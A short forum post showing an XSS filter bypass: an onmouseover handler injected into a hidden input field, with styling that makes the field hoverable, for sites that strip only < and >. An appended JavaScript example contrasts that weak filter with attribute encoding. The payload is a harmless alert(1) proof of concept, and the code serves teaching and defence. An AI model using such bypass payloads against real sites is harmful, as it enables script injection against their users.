When the input element has type="hidden" and the < and > tag characters are being filtered:

<input type="hidden" onmouseover="javascript:alert(1)" style="display:block; width:500px; height:500px;" />

IE6, 7, 8 or Firefox

Good Luck~ :-)
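
Why removing only < and > does not protect a value that lands inside a quoted attribute, and what attribute-context encoding changes. This is an added example, not code from the original post; the helper names, the name="q" field and the server-side template are assumptions, and the sample input is constructed from the attributes shown above.

```javascript
// Added example: all helper names here are hypothetical, not from the post.

// The weak filter the post describes: only < and > are removed.
function stripAngleBrackets(s) {
  return String(s).replace(/[<>]/g, "");
}

// Context-aware encoding for a double-quoted HTML attribute value.
function encodeAttr(s) {
  const map = { "&": "&amp;", '"': "&quot;", "'": "&#x27;", "<": "&lt;", ">": "&gt;" };
  return String(s).replace(/[&"'<>]/g, (c) => map[c]);
}

// Assumed server-side template: user data lands inside value="...".
function renderHidden(value, sanitize) {
  return `<input type="hidden" name="q" value="${sanitize(value)}" />`;
}

// Minimal attribute tokenizer for one tag (double-quoted values only),
// enough to see which attributes the element ends up with.
function parseAttrs(tag) {
  const attrs = {};
  const re = /([^\s"'=<>\/]+)\s*=\s*"([^"]*)"/g;
  let m;
  while ((m = re.exec(tag)) !== null) {
    const name = m[1].toLowerCase();
    if (!(name in attrs)) attrs[name] = m[2]; // first occurrence wins, as in HTML
  }
  return attrs;
}

// Names of event-handler attributes that ended up on the element.
function injectedHandlers(tag) {
  return Object.keys(parseAttrs(tag)).filter((n) => n.startsWith("on"));
}

// Constructed input, built from the attributes shown in the post.
const sample =
  '" onmouseover="javascript:alert(1)" style="display:block; width:500px; height:500px;';

const weak = renderHidden(sample, stripAngleBrackets);
const safe = renderHidden(sample, encodeAttr);
console.log(injectedHandlers(weak)); // handler attribute survives the < > filter
console.log(injectedHandlers(safe)); // value stays one inert attribute
```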

Posted by bitfox